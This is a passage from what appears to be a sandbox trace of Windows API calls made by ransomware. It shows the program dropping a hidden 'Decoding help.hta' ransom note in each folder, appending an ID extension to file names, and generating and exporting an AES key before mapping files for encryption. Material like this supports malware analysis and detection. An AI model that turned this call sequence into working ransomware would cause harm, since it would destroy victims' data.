(in: lpString1=0x10fcf5c8, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\*.*" [0055.279] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\*.*") returned 59 [0055.279] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\Decoding help.hta" [0055.279] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\decoding help.hta")) returned 0x1 [0055.279] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ITIRCL55.DLL") returned -1 [0055.279] lstrlenW (lpString="ITIRCL55.DLL") returned 12 [0055.279] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\*.*" [0055.279] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\*.*") returned 59 [0055.279] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\", lpString2="ITIRCL55.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL" [0055.279] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL" [0055.279] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL.[ID]g9uZrLhJaygpwRm1[ID]" [0055.280] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\itircl55.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\itircl55.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.525] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\itircl55.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x928 [0058.526] CreateFileMappingA (hFile=0x928, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xc9c [0058.526] CryptAcquireContextA (in: phProv=0x1409fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1409fcec*=0x2aac6ee0) returned 1 [0060.231] CryptGenKey (in: hProv=0x2aac6ee0, Algid=0x6610, dwFlags=0x1, phKey=0x1409fce8 | out: phKey=0x1409fce8*=0x10f14500) returned 1 [0060.231] CryptExportKey (in: hKey=0x10f14500, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1409fbe4, pdwDataLen=0x1409fce4 | out: pbData=0x1409fbe4*, pdwDataLen=0x1409fce4*=0x2c) returned 1 [0060.231] MapViewOfFile (hFileMappingObject=0xc9c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0x11b20000 Thread: id = 287 os_tid = 0x778 [0042.327] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*", lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db4f8 [0042.327] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.327] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.327] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.327] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.327] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c2bbccc, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x6c2bbccc, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x90daefa5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc1486, dwReserved0=0x0, dwReserved1=0x0, cFileName="Alphabet.xml", cAlternateFileName="")) returned 1 [0042.327] lstrcpyW (in: lpString1=0x10ba6450, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0042.327] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0042.328] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0042.328] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0xffffffff [0042.328] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5d0 [0042.374] WriteFile (in: hFile=0x5d0, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x141dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x141dfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0042.375] CloseHandle (hObject=0x5d0) returned 1 [0042.375] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0042.375] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Alphabet.xml") returned 1 [0042.375] lstrlenW (lpString="Alphabet.xml") returned 12 [0042.375] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0042.375] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0042.375] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Alphabet.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" [0042.375] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" [0042.375] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0042.375] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.398] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7545b2, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7545b2, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ar-SA", cAlternateFileName="")) returned 1 [0042.398] lstrcmpW (lpString1=".", lpString2="ar-SA") returned -1 [0042.398] lstrcmpW (lpString1="..", lpString2="ar-SA") returned -1 [0042.398] lstrcmpiW (lpString1="windows", lpString2="ar-SA") returned 1 [0042.398] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0042.399] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0042.399] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="ar-SA" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA" [0042.399] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\*.*" [0042.399] GlobalMemoryStatus (in: lpBuffer=0x141dfd10 | out: lpBuffer=0x141dfd10) [0042.399] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10ba6450, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x60c [0045.670] CloseHandle (hObject=0x60c) returned 1 [0045.671] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7545b2, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7545b2, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg-BG", cAlternateFileName="")) returned 1 [0045.671] lstrcmpW (lpString1=".", lpString2="bg-BG") returned -1 [0045.671] lstrcmpW (lpString1="..", lpString2="bg-BG") returned -1 [0045.671] lstrcmpiW (lpString1="windows", lpString2="bg-BG") returned 1 [0048.881] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0048.881] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0048.881] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="bg-BG" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG" [0048.881] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\*.*" [0048.881] GlobalMemoryStatus (in: lpBuffer=0x141dfd10 | out: lpBuffer=0x141dfd10) [0048.881] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x112bc100, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x438 [0048.884] CloseHandle (hObject=0x438) returned 1 [0048.884] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90daefa5, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x90daefa5, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x90daefa5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x69a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Content.xml", cAlternateFileName="")) returned 1 [0048.885] lstrcpyW (in: lpString1=0x1116bbc0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0048.885] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0048.885] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0048.885] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0048.885] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Content.xml") returned 1 [0048.885] lstrlenW (lpString="Content.xml") returned 11 [0048.885] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0048.885] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0048.885] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Content.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" [0048.885] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" [0048.885] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0048.885] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0048.885] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c92176b, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x6c92176b, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0xdd6ec0f0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x2f200, dwReserved0=0x0, dwReserved1=0x0, cFileName="ConvertInkStore.exe", cAlternateFileName="")) returned 1 [0048.885] lstrcpyW (in: lpString1=0x1116bbc0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0048.885] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0048.885] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0048.886] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0048.886] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ConvertInkStore.exe") returned 1 [0048.886] lstrlenW (lpString="ConvertInkStore.exe") returned 19 [0048.886] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0048.886] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0048.886] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="ConvertInkStore.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe" [0048.886] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe" [0048.886] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0048.886] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\convertinkstore.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\convertinkstore.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0048.886] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0048.886] lstrcmpW (lpString1=".", lpString2="cs-CZ") returned -1 [0048.886] lstrcmpW (lpString1="..", lpString2="cs-CZ") returned -1 [0048.886] lstrcmpiW (lpString1="windows", lpString2="cs-CZ") returned 1 [0048.886] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0048.886] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0048.886] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="cs-CZ" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ" [0048.886] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\*.*" [0048.886] GlobalMemoryStatus (in: lpBuffer=0x141dfd10 | out: lpBuffer=0x141dfd10) [0048.886] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5d98800, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x438 [0048.899] CloseHandle (hObject=0x438) returned 1 [0048.899] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0048.899] lstrcmpW (lpString1=".", lpString2="da-DK") returned -1 [0048.899] lstrcmpW (lpString1="..", lpString2="da-DK") returned -1 [0048.899] lstrcmpiW (lpString1="windows", lpString2="da-DK") returned 1 [0048.899] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0048.899] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0048.899] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="da-DK" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK" [0048.899] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\*.*" [0048.899] GlobalMemoryStatus (in: lpBuffer=0x141dfd10 | out: lpBuffer=0x141dfd10) [0048.899] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9a63000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x438 [0048.905] CloseHandle (hObject=0x438) returned 1 [0048.905] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0048.905] lstrcmpW (lpString1=".", lpString2="de-DE") returned -1 [0048.905] lstrcmpW (lpString1="..", lpString2="de-DE") returned -1 [0048.905] lstrcmpiW (lpString1="windows", lpString2="de-DE") returned 1 [0048.908] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 